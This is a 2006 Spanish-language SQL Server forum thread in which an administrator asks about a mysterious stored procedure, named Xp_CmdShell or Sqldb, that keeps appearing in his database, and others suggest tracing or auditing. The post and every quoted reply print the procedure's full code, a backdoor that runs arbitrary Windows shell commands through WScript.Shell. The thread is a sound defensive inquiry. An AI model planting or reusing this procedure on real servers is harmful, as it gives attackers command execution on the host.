Procedimiento almacenado sospechoso

27/02/2006 - 18:02 por Manel Gonzalez | Informe spam

Hola a todos...

Creo que tengo un problema, aunque no se si es serio o no. En los últimos 3
meses se me han creado 3 procedimientos en la base de datos "por arte de
magia"
El texto del procedimiento siempre es el mismo, lo único que cambia es el
nombre: dos veces se generó con el nombre de Xp_CmdShell y otra con Sqldb.

CREATE PROCEDURE sqldb(@cmd varchar(255), @Wait int = 0) AS
DECLARE @result int, @OLEResult int, @RunResult int
DECLARE @ShellID int

EXECUTE @OLEResult = sp_OACreate 'WScript.Shell', @ShellID OUT
IF @OLEResult <> 0 SELECT @result = @OLEResult
IF @OLEResult <> 0 RAISERROR ('CreateObject %0X', 14, 1, @OLEResult)

EXECUTE @OLEResult = sp_OAMethod @ShellID, 'Run', Null, @cmd, 0, @Wait
IF @OLEResult <> 0 SELECT @result = @OLEResult
IF @OLEResult <> 0 RAISERROR ('Run %0X', 14, 1, @OLEResult)

EXECUTE @OLEResult = sp_OADestroy @ShellID

return @result

A alguien más le ha pasado lo mismo?? Es un gusano que corre por ahí?
Puedo mediante el Profiler saber que proceso crea un procedimiento?? (lo he
estado mirando y me parece que no se puede)

Siga el debate

5 respuestas

Tengo una respuesta

Preguntas similare

Mostrar todos los temas similares

Leer las respuestas

#1 Penta

27/02/2006 - 19:07 | Informe spam

Cual es el resultado de dicho SP ?
No tienes algun desarrollador con privilegios para crear SP ?

Responder a este mensaje

#2 Maxi [MVP]

28/02/2006 - 01:07 | Informe spam

Hola, quizas sea alguna aplicacion que lo esta haciendo o alguna persona con
permisos!!

Salu2
-
[MVP] SQL Server
Orador para Culminis Latam
www.sqlgurus.org

MSN:

"Manel Gonzalez" escribió en el mensaje
news:%23pQRW%

Hola a todos...

Creo que tengo un problema, aunque no se si es serio o no. En los últimos
3 meses se me han creado 3 procedimientos en la base de datos "por arte de
magia"
El texto del procedimiento siempre es el mismo, lo único que cambia es el
nombre: dos veces se generó con el nombre de Xp_CmdShell y otra con Sqldb.

CREATE PROCEDURE sqldb(@cmd varchar(255), @Wait int = 0) AS
DECLARE @result int, @OLEResult int, @RunResult int
DECLARE @ShellID int

EXECUTE @OLEResult = sp_OACreate 'WScript.Shell', @ShellID OUT
IF @OLEResult <> 0 SELECT @result = @OLEResult
IF @OLEResult <> 0 RAISERROR ('CreateObject %0X', 14, 1, @OLEResult)

EXECUTE @OLEResult = sp_OAMethod @ShellID, 'Run', Null, @cmd, 0, @Wait
IF @OLEResult <> 0 SELECT @result = @OLEResult
IF @OLEResult <> 0 RAISERROR ('Run %0X', 14, 1, @OLEResult)

EXECUTE @OLEResult = sp_OADestroy @ShellID

return @result

A alguien más le ha pasado lo mismo?? Es un gusano que corre por ahí?
Puedo mediante el Profiler saber que proceso crea un procedimiento?? (lo
he estado mirando y me parece que no se puede)

Responder a este mensaje

#3 Manel Gonzalez

28/02/2006 - 12:55 | Informe spam

Pues la aparición de dicho store coincidió en el tiempo con la instalación
de una aplicación nueva de contabilidad en versión de evaluación...

El caso es que ya desinstalamos la aplicación e incluso eliminé los usuarios
que di de alta para la misma...

Los programas que tenemos se conectan a SQLServer con un login de sql que no
tiene permisos para crear procedimientos (datareader + datawriter). Los
unicos que pueden crear procedimientos son el sa, el mio y el login de
programadores, y éstos me dicen que no crean ninguno con ese nombre.

Además, la hora de creacion de esos procedimientos suele ser de madrugada...
por eso preguntaba lo del profiler

El procedimiento en cuestión parece ser que ejecuta un comando Windows
Script (el que se le pasa en la variable @cmd)
"Maxi [MVP]" escribió en el mensaje
news:ebl6Ds$

Hola, quizas sea alguna aplicacion que lo esta haciendo o alguna persona
con permisos!!

Salu2
-
[MVP] SQL Server
Orador para Culminis Latam
www.sqlgurus.org

MSN:

"Manel Gonzalez" escribió en el mensaje
news:%23pQRW%

Hola a todos...

Creo que tengo un problema, aunque no se si es serio o no. En los últimos
3 meses se me han creado 3 procedimientos en la base de datos "por arte
de magia"
El texto del procedimiento siempre es el mismo, lo único que cambia es el
nombre: dos veces se generó con el nombre de Xp_CmdShell y otra con
Sqldb.

CREATE PROCEDURE sqldb(@cmd varchar(255), @Wait int = 0) AS
DECLARE @result int, @OLEResult int, @RunResult int
DECLARE @ShellID int

EXECUTE @OLEResult = sp_OACreate 'WScript.Shell', @ShellID OUT
IF @OLEResult <> 0 SELECT @result = @OLEResult
IF @OLEResult <> 0 RAISERROR ('CreateObject %0X', 14, 1, @OLEResult)

EXECUTE @OLEResult = sp_OAMethod @ShellID, 'Run', Null, @cmd, 0, @Wait
IF @OLEResult <> 0 SELECT @result = @OLEResult
IF @OLEResult <> 0 RAISERROR ('Run %0X', 14, 1, @OLEResult)

EXECUTE @OLEResult = sp_OADestroy @ShellID

return @result

A alguien más le ha pasado lo mismo?? Es un gusano que corre por ahí?
Puedo mediante el Profiler saber que proceso crea un procedimiento?? (lo
he estado mirando y me parece que no se puede)

Responder a este mensaje

#4 Maxi

28/02/2006 - 12:58 | Informe spam

Podrias poner una traza y ver que pasa. Me imagino que es SQL2000 porque si
fuere SQL2005 podrias implementar un DDL trigger de auditoria y chau :-)

Salu2
Maxi [MVP SQL SERVER]
www.sqlgurus.org

"Manel Gonzalez" escribió en el mensaje
news:

Pues la aparición de dicho store coincidió en el tiempo con la instalación
de una aplicación nueva de contabilidad en versión de evaluación...

El caso es que ya desinstalamos la aplicación e incluso eliminé los
usuarios que di de alta para la misma...

Los programas que tenemos se conectan a SQLServer con un login de sql que
no tiene permisos para crear procedimientos (datareader + datawriter). Los
unicos que pueden crear procedimientos son el sa, el mio y el login de
programadores, y éstos me dicen que no crean ninguno con ese nombre.

Además, la hora de creacion de esos procedimientos suele ser de
madrugada... por eso preguntaba lo del profiler

El procedimiento en cuestión parece ser que ejecuta un comando Windows
Script (el que se le pasa en la variable @cmd)
"Maxi [MVP]" escribió en el mensaje
news:ebl6Ds$

Hola, quizas sea alguna aplicacion que lo esta haciendo o alguna persona
con permisos!!

Salu2
-
[MVP] SQL Server
Orador para Culminis Latam
www.sqlgurus.org

MSN:

"Manel Gonzalez" escribió en el mensaje
news:%23pQRW%

Hola a todos...

Creo que tengo un problema, aunque no se si es serio o no. En los
últimos 3 meses se me han creado 3 procedimientos en la base de datos
"por arte de magia"
El texto del procedimiento siempre es el mismo, lo único que cambia es
el nombre: dos veces se generó con el nombre de Xp_CmdShell y otra con
Sqldb.

CREATE PROCEDURE sqldb(@cmd varchar(255), @Wait int = 0) AS
DECLARE @result int, @OLEResult int, @RunResult int
DECLARE @ShellID int

EXECUTE @OLEResult = sp_OACreate 'WScript.Shell', @ShellID OUT
IF @OLEResult <> 0 SELECT @result = @OLEResult
IF @OLEResult <> 0 RAISERROR ('CreateObject %0X', 14, 1, @OLEResult)

EXECUTE @OLEResult = sp_OAMethod @ShellID, 'Run', Null, @cmd, 0, @Wait
IF @OLEResult <> 0 SELECT @result = @OLEResult
IF @OLEResult <> 0 RAISERROR ('Run %0X', 14, 1, @OLEResult)

EXECUTE @OLEResult = sp_OADestroy @ShellID

return @result

A alguien más le ha pasado lo mismo?? Es un gusano que corre por ahí?
Puedo mediante el Profiler saber que proceso crea un procedimiento?? (lo
he estado mirando y me parece que no se puede)

Responder a este mensaje

#5 Manel Gonzalez

28/02/2006 - 14:43 | Informe spam

Si, lamentablemente es un sql2000
"Maxi" escribió en el mensaje
news:

Podrias poner una traza y ver que pasa. Me imagino que es SQL2000 porque
si fuere SQL2005 podrias implementar un DDL trigger de auditoria y chau
:-)

Salu2
Maxi [MVP SQL SERVER]
www.sqlgurus.org

"Manel Gonzalez" escribió en el mensaje
news:

Pues la aparición de dicho store coincidió en el tiempo con la
instalación de una aplicación nueva de contabilidad en versión de
evaluación...

El caso es que ya desinstalamos la aplicación e incluso eliminé los
usuarios que di de alta para la misma...

Los programas que tenemos se conectan a SQLServer con un login de sql que
no tiene permisos para crear procedimientos (datareader + datawriter).
Los unicos que pueden crear procedimientos son el sa, el mio y el login
de programadores, y éstos me dicen que no crean ninguno con ese nombre.

Además, la hora de creacion de esos procedimientos suele ser de
madrugada... por eso preguntaba lo del profiler

El procedimiento en cuestión parece ser que ejecuta un comando Windows
Script (el que se le pasa en la variable @cmd)
"Maxi [MVP]" escribió en el mensaje
news:ebl6Ds$

Hola, quizas sea alguna aplicacion que lo esta haciendo o alguna persona
con permisos!!

Salu2
-
[MVP] SQL Server
Orador para Culminis Latam
www.sqlgurus.org

MSN:

"Manel Gonzalez" escribió en el mensaje
news:%23pQRW%

Hola a todos...

Creo que tengo un problema, aunque no se si es serio o no. En los
últimos 3 meses se me han creado 3 procedimientos en la base de datos
"por arte de magia"
El texto del procedimiento siempre es el mismo, lo único que cambia es
el nombre: dos veces se generó con el nombre de Xp_CmdShell y otra con
Sqldb.

CREATE PROCEDURE sqldb(@cmd varchar(255), @Wait int = 0) AS
DECLARE @result int, @OLEResult int, @RunResult int
DECLARE @ShellID int

EXECUTE @OLEResult = sp_OACreate 'WScript.Shell', @ShellID OUT
IF @OLEResult <> 0 SELECT @result = @OLEResult
IF @OLEResult <> 0 RAISERROR ('CreateObject %0X', 14, 1, @OLEResult)

EXECUTE @OLEResult = sp_OAMethod @ShellID, 'Run', Null, @cmd, 0, @Wait
IF @OLEResult <> 0 SELECT @result = @OLEResult
IF @OLEResult <> 0 RAISERROR ('Run %0X', 14, 1, @OLEResult)

EXECUTE @OLEResult = sp_OADestroy @ShellID

return @result

A alguien más le ha pasado lo mismo?? Es un gusano que corre por ahí?
Puedo mediante el Profiler saber que proceso crea un procedimiento??
(lo he estado mirando y me parece que no se puede)

Siga el debate Respuesta

Responder a este mensaje

Ads by Google

Hacer una pregunta

Tengo una respuesta

Busqueda sugerida